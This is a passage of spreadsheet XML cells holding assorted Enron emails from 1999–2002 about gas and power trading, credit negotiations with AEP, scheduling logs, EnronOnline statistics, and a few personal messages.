    <t>Wed, 5 Jan 2000 09:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.shults@enron.com', 'dale.neuner@enron.com', 'david.forster@enron.com'})</t>
  </si>
  <si>
    <t>eol products</t>
  </si>
  <si>
    <t xml:space="preserve">The gas group would like to roll out some new products and new locations for _x000D_
existing products in the next few weeks. _x000D_
The new products are Gas Daily and Physical index trades. I know that the Gas _x000D_
Daily products currently exist but the long and short descriptions need some _x000D_
work. _x000D_
I should have a list of new locations shortly._x000D_
_x000D_
Please let me know who I need to work with to make each of these things _x000D_
happen.  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Pete _x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Jan 2002 15:30:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'8777865122@skytel.com'})</t>
  </si>
  <si>
    <t>Marketers</t>
  </si>
  <si>
    <t xml:space="preserve">We are dropping a lot of marketers. It would be nice to keep 1 or 2. </t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 08:12:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lwbthemarine@alltel.net'})</t>
  </si>
  <si>
    <t>Fw: words of wisdom</t>
  </si>
  <si>
    <t xml:space="preserve">-----_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Subject: Words of wisdom_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; If a Dog were the teacher you would learn stuff like....._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; When loved ones come home, always run to greet them._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Never pass up the opportunity to go for a joyride._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Allow the experience of fresh air and the wind in your face to be pure_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; ecstasy._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; When it's in your best interest, practice obedience._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Let others know when they've invaded your territory._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Take naps. Stretch before rising._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Run, romp, and play daily._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Thrive on attention and let people touch you._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Avoid biting when a simple growl will do._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; On warm days, stop to lie on your back on the grass._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; On hot days, drink lots of water and lie under a shady tree._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; When you're happy, dance around and wag your whole body._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; No matter how often you're scolded, don't buy into the guilt thing and_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; pout....run right back and make friends._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Delight in the simple joy of a long walk._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Eat with gusto and enthusiasm. Stop when you have had enough._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Be loyal._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Never pretend to be something you're not._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; If what you want lies buried, dig until you find it._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; When someone is having a bad day, be silent, sit close by and nuzzle_x000D_
&gt; &gt; &gt; them_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; gently._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; And finally, Never trust anyone until you sniff their butt._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 14:04:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: ICAP/UCAP Certification Reminder</t>
  </si>
  <si>
    <t>_x000D_
Juan,_x000D_
_x000D_
FYI_x000D_
 -----Original Message-----_x000D_
From: 	owner-nyiso_tech_exchange@lists.thebiz.net@EES   On Behalf Of RBoyle@nyiso.com_x000D_
Sent:	Monday, October 22, 2001 4:03 PM_x000D_
To:	market_relations@nyiso.com_x000D_
Subject:	ICAP/UCAP Certification Reminder_x000D_
_x000D_
_x000D_
RBoyle@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
By October 24, 12 Midnight, all Suppliers, LSEs and Marketers must certify_x000D_
their November UCAP activity._x000D_
_x000D_
The ISO may impose  a sanction for failure to certify._x000D_
_x000D_
_x000D_
_x000D_
Bob Boyle</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 21:52:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lwlanfear@wcnet.net'})</t>
  </si>
  <si>
    <t>hello kay</t>
  </si>
  <si>
    <t>hello kay, got your e-mail.  i haven't made a list yet.  i was in bay city all day today, came home with a bad-#@# head-ache, back ache, have had dirreah all day,  then i come home to find out i have to be in the dentist tomorrow for at least 2 more hours. they have to grind my teeth down some more.  she told me her lab was picky. they called her and told her that she needed to grind some more because they want a perfect look and needed more room to make them look like the wax model they did. oh yeah the rest of the crap above is all a bad pms symptom,  i started spotting tonite so the next three days or gona be a doosy.  well i'll get back tomorrow ok.                love ya, bev</t>
  </si>
  <si>
    <t>Wed, 8 Sep 1999 04:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Form Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sara:  Michelle asked that I forward a copy of her consulting agreement _x000D_
form.  Here it is._x000D_
_x000D_
K_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 05:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>REVISED ALREADY - CNG JAN 00 numbers</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 12/27/99 01:51 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
pdrexel@columbiaenergygroup.com on 12/27/99 01:38:04 PM_x000D_
To: Dan Junek/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: REVISED ALREADY - CNG JAN 00 numbers_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Paul Drexelius/CES/ColumbiaGas on_x000D_
12/27/2000 01:44 PM ---------------------------_x000D_
_x000D_
_x000D_
Heidi Boyd_x000D_
12/27/99 01:43 PM_x000D_
_x000D_
To: Morgan Sharifi/CES/ColumbiaGas@ColumbiaGas_x000D_
cc: Noel Bartlo/CES/ColumbiaGas@ColumbiaGas, Paul_x000D_
Drexelius/CES/ColumbiaGas@ColumbiaGas_x000D_
Subject: REVISED ALREADY     - CNG JAN 00 numbers_x000D_
_x000D_
Please up that to 2,300 dth's/day     starting   1 JAN 2000._x000D_
_x000D_
_x000D_
Thanks again!_x000D_
_x000D_
---------------------- Forwarded by Heidi Boyd/CES/ColumbiaGas on 12/27/99_x000D_
02:41 PM ---------------------------_x000D_
_x000D_
_x000D_
Heidi Boyd_x000D_
12/27/99 02:41 PM_x000D_
_x000D_
To: Morgan Sharifi/CES/ColumbiaGas@ColumbiaGas_x000D_
cc: Paul Drexelius/CES/ColumbiaGas@ColumbiaGas, Noel_x000D_
Bartlo/CES/ColumbiaGas@ColumbiaGas_x000D_
Subject: CNG JAN 00 numbers_x000D_
_x000D_
Hi Morgan,_x000D_
_x000D_
Please schedule a daily total of 2095 to NYSEG off of CNG for Jan 2000._x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 08:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: PG&amp;E Advice Letter</t>
  </si>
  <si>
    <t xml:space="preserve">We want to see this one to._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Daniel Douglass" &lt;Douglass@ArterHadden.com&gt; on 11/15/2000 11:44:12 AM_x000D_
To: &lt;jdasovic@enron.com&gt;, &lt;marcie.milner@enron.com&gt;, &lt;mpetroch@enron.com&gt;, _x000D_
&lt;Roger_Yang@enron.com&gt;, &lt;susan_j_mara@enron.com&gt;_x000D_
cc:  _x000D_
Subject: PG&amp;E Advice Letter_x000D_
_x000D_
_x000D_
_x000D_
PG&amp;E has also filed its version of a net energy metering tariff.?  Are any of _x000D_
these tariffs of interest to Enron?_x000D_
?_x000D_
Dan_x000D_
 - 11-15-00 PG&amp;E AL Summary Chart.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 12:49:32 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bradford, William S.  _x000D_
Sent:	Tuesday, November 13, 2001 4:39 PM_x000D_
To:	'fhilton@aep.com'_x000D_
Subject:	RE:  _x000D_
_x000D_
Frank,_x000D_
_x000D_
We have already done a number of things to help reduce AEP's exposure to Enron, none of which were required contractually.  We made a margin payment of $50,000,000.  We arranged ring-trades with Allegheny which reduced your exposure by over $90,000,000.  We have proposed a number of assignments which would reduce your exposure to Enron incrementally.  _x000D_
_x000D_
Conversely, pursuant to our contracts AEP has failed to pay a $1,311,625.46 swap settlement that was due on 11/8/01.  Additionally, a margin call which was due to Enron on 11/8/01 in the amount of $19,250,000 and remains unpaid.  Additionally, AEP has failed to continue to trade with Enron which was not our understanding of the agreement._x000D_
_x000D_
Enron maintains its investment grade credit rating and is receiving $1.5 billion of additional funded equity capital from Dynegy as announced on Friday.  We are more than happy to continue helping you to reduce exposures in mutually agreeable manners but do not agree to the below list of requests.  We need you to address these above issues before we can progress on these exposure reductions._x000D_
_x000D_
Regards,_x000D_
Bill_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	ksbrown1@aep.com@ENRON   On Behalf Of fhilton@aep.com_x000D_
Sent:	Tuesday, November 13, 2001 12:19 PM_x000D_
To:	wbradfo@ect.enron.com_x000D_
Subject:	 _x000D_
_x000D_
_x000D_
Per our conversation on November 12, 2001, AEP has reassessed it's risk tolerance for Enron Corporation.  In light of the current status, we propose the following things to be done to allow for normal trading and other business activity to commence: _x000D_
        A fully executed Master Set Off Agreement (MSA) with an Adequate Assurance provision and no MAC clauses. _x000D_
        An agreement that allows for same day margining _x000D_
        Cash collateral or Letter of Credit to bring exposure down to zero _x000D_
        Work towards executing an EEI Agreement _x000D_
        HPL post closing settlement payment must be paid as agreed by both parties _x000D_
        Settlement of all payments due and past due _x000D_
_x000D_
These are the critical issues we feel must be addressed to get things back to normal.  We appreciate all that has been done thusfar in working to mitigate our exposure, however, we now feel that more should be done to protect what we have at risk. _x000D_
_x000D_
I look forward to your reply, should you have any questions, comments or otherwise, please give me a call. _x000D_
_x000D_
Best Regards, _x000D_
_x000D_
Frank Hilton _x000D_
Managing Director, _x000D_
Chief Credit Officer _x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 03:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Cutter</t>
  </si>
  <si>
    <t>Please look at the attached redline.  If you are in agreement,  and Jeff _x000D_
gives his approval, I will send execution docs._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
dp_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Fri, 1 Mar 2002 09:14:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.ellenberg@cwt.com'})</t>
  </si>
  <si>
    <t>RE: Enron/Columbia Gas</t>
  </si>
  <si>
    <t>I'm not aware of an AP rate schedule.  AS (tariff sheet #205) and IPP (tariff sheet #215) are separate rate schedules in the tariff.  AS pools are used to aggregate production meters on CGAS's system and are assigned a specific geographical location on the pipeline.  AS pool meters can be used as primary receipt points on firm transportation agreements whereas IPP Pool meters are not._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McMichael Jr., Ed  _x000D_
Sent:	Friday, March 01, 2002 10:49 AM_x000D_
To:	Germany, Chris_x000D_
Subject:	FW: Enron/Columbia Gas_x000D_
_x000D_
can you help?  Please review the attachment and let's discuss._x000D_
Ed_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Mark Ellenberg" &lt;Mark.Ellenberg@cwt.com&gt;@ENRON  _x000D_
Sent:	Friday, March 01, 2002 10:25 AM_x000D_
To:	sproctor@akllp.com; McMichael Jr., Ed_x000D_
Cc:	Mann, Kay; Edward Smith; melanie.gray@weil.com_x000D_
Subject:	Enron/Columbia Gas_x000D_
_x000D_
Shemin, can you answer Ed Smith's question concerning the pooling tarriff?_x000D_
_x000D_
Ed McMichael, do you have knowledge concerning the EES pooling agreements?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark C. Ellenberg_x000D_
Cadwalader, Wickersham &amp; Taft_x000D_
1201 F Street, NW_x000D_
Washington, DC  20004_x000D_
202.862.2234_x000D_
----- Forwarded by Mark Ellenberg/DC/CWT on 03/01/02 11:21 AM -----_x000D_
_x000D_
                    Edward Smith_x000D_
                    Office:              To:     Mark Ellenberg/DC/CWT@CWT_x000D_
                                         cc:_x000D_
                    03/01/02             Subject:     Enron/Columbia Gas_x000D_
                    11:13 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Two quick questions:_x000D_
_x000D_
1.   The Columbia Gas motion refers to two pooling agreements, the IPP_x000D_
Service Agreement and the AS Service     Agreement.  Ms. Shemin's e mail_x000D_
attaches a copy of a rate schedule entitled "IPP Rate Schedule_x000D_
Interruptible  Paper Pools."   Does this rate schedule also apply to the AP_x000D_
Service Agreement, or is there another rate        schedule for that_x000D_
agreement?._x000D_
_x000D_
2.   Can Mr. McMichael swear the affidavit with respect to the pooling_x000D_
agreements, which are with EES, not ENA?_x000D_
_x000D_
_x000D_
_x000D_
==============================================================================_x000D_
NOTE:  The information in this email is confidential and may be legally privileged.  If you are not the intended recipient, you must not read, use or disseminate the information.  Although this email and any attachments are believed to be free of any virus or other defect_x000D_
that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by Cadwalader, Wickersham_x000D_
&amp; Taft for any loss or damage arising in any way from its use._x000D_
_x000D_
_x000D_
==============================================================================_x000D_
_x000D_
_x000D_
==============================================================================_x000D_
NOTE:  The information in this email is confidential and may be legally privileged.  If you are not the intended recipient, you must not read, use or disseminate the information.  Although this email and any attachments are believed to be free of any virus or other defect_x000D_
that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by Cadwalader, Wickersham_x000D_
&amp; Taft for any loss or damage arising in any way from its use._x000D_
_x000D_
_x000D_
==============================================================================</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 23:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>you might want to package a deal and move up to number 1 b/c if not you wont _x000D_
get the player you want.  daddy has #1.</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 11:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Meter # 9842</t>
  </si>
  <si>
    <t>Daren,_x000D_
_x000D_
Mike in Gas Control called and said meter # 9842 is flooded and has not flowed in a couple of days.  The field tech said it will probably be a few days before it resumes.  Do you want the nom adjusted?  It is at 8,034.  The deal # is 377169._x000D_
_x000D_
Bob</t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 02:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Length from APX</t>
  </si>
  <si>
    <t xml:space="preserve">Group,_x000D_
I have purchased 8 mws from the service desk for Tuesday (04/10) in SP-15.  _x000D_
We bought 8 mws from a service customer through the APX.  I have made the _x000D_
entries into CAPs for the purchase from APX.  I have inc'd load in ST-WBOM.  _x000D_
Load will need to be dec'd and the energy sold off. You may want to  combine _x000D_
it with EES(or buy some mws to make it a whole piece to sell) and use NCPA to _x000D_
move it North.  Or maybe export it at Silverpeak.  The schedule is as _x000D_
follows.  8 mw, HE 1-24 on 04/10 in SP-15.  The price is $150 peak, and $100 _x000D_
off peak.  Purchase from Services is #574640, and purchase from APX is _x000D_
#574629.  Please make any buy-resales and sales under ST-WBOM. _x000D_
Please call with any questions._x000D_
_x000D_
Thanks,_x000D_
Bill_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 10:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EnronOnline Executive Summary for October 16, 2000</t>
  </si>
  <si>
    <t>Following please find the Daily EnronOnline Executive Summary._x000D_
_x000D_
EnronOnline Executive Summary for 10/16/00_x000D_
Transaction Summary	_x000D_
External Transactions Today	2,765_x000D_
Average Daily External Transactions (30 day Trailing Avg)	2,745_x000D_
Total Life to Date Transactions	360,327_x000D_
_x000D_
EnronOnline Daily % of Entity's Total Transactions for 	10/16/00_x000D_
Enron North America	76%_x000D_
Enron Europe Limited	38%_x000D_
GLOBAL PRODUCTS	37%_x000D_
Enron Metals	5%_x000D_
_x000D_
EnronOnline Percentage of Total Corporate Transactions _x000D_
(30 day Trailing Avg)	44%_x000D_
_x000D_
Gross Notional Value of EnronOnline Transactions	Total_x000D_
Today	1,677,113,787_x000D_
MTD	20,952,824,307_x000D_
LTD	189,645,058,578_x000D_
Average Daily Notional Value (30 Day Trailing Avg)	1,825,355,496_x000D_
	_x000D_
Notional Revenue from Physical Flows to Date	13,469,076,327_x000D_
_x000D_
Counterparties, Users, and Products Offered	_x000D_
Counterparties having transacted to date	513_x000D_
New Counterparties transacting for the first time today	1_x000D_
Number of Products Offered Today	1,181_x000D_
Total Number of External Users Logged on Today	2,721_x000D_
Average # of External Users logged on (30 day Trailing Avg)	2,515</t>
  </si>
  <si>
    <t>Mon, 14 Feb 2000 13:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gappy@stanford.edu'})</t>
  </si>
  <si>
    <t>Visiting Enron</t>
  </si>
  <si>
    <t>Dr. Kaminski, I would like to thank you very much for taking care of Amy and _x000D_
me_x000D_
during our trip to Houston. What I saw at Enron Communication was nothing _x000D_
short_x000D_
of revolutionary. More than that, I was impressed with the drive of the _x000D_
people,_x000D_
their kindness, and their proficiency. I look forward to meeting you again in_x000D_
Stanford during the last weekend of February. I will send you an email next_x000D_
week, so that we can arrange a meeting between you and Prof. Bambos._x000D_
All the best wishes,_x000D_
_x000D_
Giuseppe_x000D_
_x000D_
_x000D_
--_x000D_
::Giuseppe A Paleologo::                  http://www.stanford.edu/~gappy_x000D_
_________________________________________________________________________x000D_
"What a waste it is to lose one's mind. Or not to have a mind is being_x000D_
very wasteful. How true that is."_x000D_
_x000D_
    - Vice President Dan Quayle winning friends while_x000D_
      speaking to the United Negro College Fund, 5/9/89 -</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 11:14:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>Buyback deals expire</t>
  </si>
  <si>
    <t xml:space="preserve">Daren,_x000D_
Julie Meyers sent me the list of buyback/sale/swing tickets_x000D_
- I told her some expire 4/30/01 and asked if they were to be extended. _x000D_
She didn't have any knowledge of any being extended to May - do you know who to ask?_x000D_
			undertake	sale		swing_x000D_
Beaumont Methanol 	696599 		696585		696594_x000D_
Union Carbide				699730_x000D_
Valero			478227		454447_x000D_
Valero			478230		454455_x000D_
Valero			478229		454452_x000D_
_x000D_
_x000D_
Thanks - Julie					</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 21:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Revised Schedules</t>
  </si>
  <si>
    <t xml:space="preserve">Shonnie,  Attached are my comments per our discussion._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 08:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'melissa.jones@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mark.knippa@enron.com', 'brian.redmond@enron.com', 'julie.gomez@enron.com', 'maria.tefel@enron.com', 'chris.hilgert@enron.com', 'davis.thames@enron.com', 'lacye.brymer@enron.com', 'cris.sherman@enron.com', 'eric.moon@enron.com', 'carol.carter@enron.com', 'andrew.miles@enron.com', 'john.griffith@enron.com', 'jean.mrha@enron.com', 'alisha.guerrero@enron.com', 'mark.courtney@enron.com', 'john.gordon@enron.com', 'gerald.nemec@enron.com', 'lisa.druzbik@enron.com', 'shahid.shah@enron.com', 'petual.jeanmard@enron.com', 'lillian.carroll@enron.com'})</t>
  </si>
  <si>
    <t>Hubbard III Closing Celebration - Monday, October 30th</t>
  </si>
  <si>
    <t xml:space="preserve">Please note that the date on the actual invitation is wrong, but the email is _x000D_
correct.  The date for the Hubbard III Closing Celebration is Monday, October _x000D_
30th @ 5:30 pm.  I apologize for any inconvenience this has caused._x000D_
_x000D_
Thank you,_x000D_
Melissa Jones_x000D_
x37960_x000D_
---------------------- Forwarded by Melissa Jones/NA/Enron on 10/24/2000 _x000D_
02:56 PM ---------------------------_x000D_
_x000D_
_x000D_
Melissa Jones_x000D_
10/24/2000 11:58 AM_x000D_
To: Brian Redmond/HOU/ECT@ECT, Julie A Gomez/HOU/ECT@ECT, _x000D_
jean.mrha@enron.com, Cris Sherman/HOU/ECT@ECT, Gerald Nemec/HOU/ECT@ECT, John _x000D_
Griffith/Corp/Enron@Enron, Eric Moon/HOU/ECT@ECT, Davis Thames/Enron _x000D_
Communications@Enron Communications, Mark Courtney/HOU/ECT@ECT, Mark _x000D_
Courtney/HOU/EES@EES, Mark Knippa/HOU/ECT@ECT, Andrew Miles/NA/Enron@Enron, _x000D_
John B Gordon/NA/Enron@Enron, Petual Jeanmard/Corp/Enron@Enron, Maria _x000D_
Tefel/NA/Enron@Enron, Chris Hilgert/HOU/ECT@ect, Lisa Druzbik/NA/Enron@Enron, _x000D_
Carol Carter/HOU/ECT@ECT, Shahid Shah/NA/Enron@Enron, Lacye _x000D_
Brymer/NA/Enron@Enron, Alisha Guerrero/HOU/ECT@ECT, Lillian _x000D_
Carroll/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Hubbard III Closing Celebration_x000D_
_x000D_
Please see the attached invitation for the Hubbard III Closing Celebration.  _x000D_
Details are as follows:_x000D_
_x000D_
 Date:  Monday, October 30th_x000D_
 Time:  5:30 PM_x000D_
 Location: Slainte Irish Pub_x000D_
   509 Main Street_x000D_
_x000D_
Please RSVP to Melissa Jones via email, or by phone at (713) 853-7960 by _x000D_
October 26th._x000D_
_x000D_
Thank you,_x000D_
Melissa Jones_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Jan 2002 12:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Can you do on gas and power together._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Webb, Jay  _x000D_
Sent:	Thursday, January 03, 2002 2:36 PM_x000D_
To:	Kitchen, Louise_x000D_
Subject:	RE: _x000D_
_x000D_
Hi Louise._x000D_
_x000D_
This spreadsheet has life-to-date transaction counts for all counterparties for North American Gas and Power.  There are separate tabs for gas and power.   The top 50 in each case are highlighted.  Legal entitites are rolled up where it seemed appropriate (for instance, there are about 10 Aquila entities which are rolled up to a single Aquila count)._x000D_
_x000D_
--jay_x000D_
_x000D_
 &lt;&lt; File: Top Gas and Power Counterparties.xls &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Thursday, January 03, 2002 1:31 PM_x000D_
To:	Webb, Jay_x000D_
Subject:	_x000D_
_x000D_
Top 50 counterparties - can you send me the list?_x000D_
_x000D_
Louise Kitchen_x000D_
Chief Operating Officer_x000D_
Enron Americas_x000D_
Tel:  713 853 3488_x000D_
Fax: 713 646 2308</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 01:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Preliminary DPR</t>
  </si>
  <si>
    <t>One of Market Risk's primary responsibilities is to review Enron's trading _x000D_
activities and provide feedback to management, and management's expectation _x000D_
is that this is feedback and analysis is provided at the beginning of the _x000D_
Houston trading day.  Global Risk Management Operations in Houston is now _x000D_
providing Market Risk with a Enron Consolidated Preliminary DPR prior to 8 _x000D_
a.m. Houston time, for use in Market Risk's morning meeting where we review _x000D_
all of Enron's trading activities from the prior day.  The only information _x000D_
missing from this is the UK, and I understand we do not receive the London _x000D_
DPR until 10:30a.m, 4:30pm your time.  _x000D_
I'm sure you're working toward obtaining a final DPR earlier in the day, but _x000D_
meanwhile, we'd like to obtain a preliminary DPR that Global Ops can _x000D_
consolidate for Houston management's use first thing in the morning, as _x000D_
decisions need to be made each day based on Enron's consolidated exposure, _x000D_
etc..   We understand they're preliminary, but we work off preliminary #s _x000D_
from Houston, and I expect with the 6 hour time difference, your preliminary _x000D_
#s will be much firmer than ours.  We can start with just P/L and VaR, so _x000D_
it's not that many #s we need.  I'm hoping when we get the RisktRAC feeds _x000D_
complete we'll be able to see positions earlier as well._x000D_
_x000D_
Please let us know when we can begin receiving this information._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Cassandra Schultz_x000D_
VP, Market Risk Management_x000D_
work 713 853 0429_x000D_
cell 713 858 2618_x000D_
home 936 321 2185</t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 09:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Media info</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Mark Palmer/Corp/Enron on 02/08/2001 05:27 PM -----_x000D_
_x000D_
	Margaret.Allen@enron.com_x000D_
	02/08/2001 05:19 PM_x000D_
		 _x000D_
		 To: mark.palmer@enron.com_x000D_
		 cc: _x000D_
		 Subject: Media info_x000D_
_x000D_
_x000D_
Mark, let me know if this is what you were looking for:_x000D_
_x000D_
   $2Million on 1st Quarter buy-- $1.5M on National Cable and $.5M on spot_x000D_
   Working with EMS, we received a 100% increase in value on the national_x000D_
   buy and 66% increase in value on the spot buy_x000D_
   National Cable buy includes CNN, CNNfn, CNBC, ESPN, Fox News, Discovery_x000D_
   Cannel and The History Channel_x000D_
   Our spot buys cover NY, DC and Houston on CBS and ABC_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 04:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/11/01; HourAhead hour: 12;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/11/01; HourAhead hour: 12;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041112.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_ERNIE_x000D_
  ENGY_TYPE: NFRM_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: MALIN_5_RNDMTN_x000D_
  INTERCHG_ID: EPMI_CISO_BERT_x000D_
  ENGY_TYPE: NFRM_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 12 / Preferred:   2.30 / Final:   2.29)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE4_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 05:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Research Needs</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, I'll get with Mike and let you know.  _x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jennifer Fraser                           10/11/2000 11:39 AM_x000D_
	_x000D_
_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc: Heather Purcell/HOU/AZURIX@AZURIX _x000D_
Subject: Research Needs_x000D_
_x000D_
Jeff:_x000D_
 As Heather and I  finish defining each group's needs, we were wondering if _x000D_
the Office of the Chairman needs any data, analysis or publications on a _x000D_
regular basis? If you do we need to put you on the project timeline. Please _x000D_
let us know._x000D_
Thanks_x000D_
Jen_x000D_
_x000D_
</t>
  </si>
  <si>
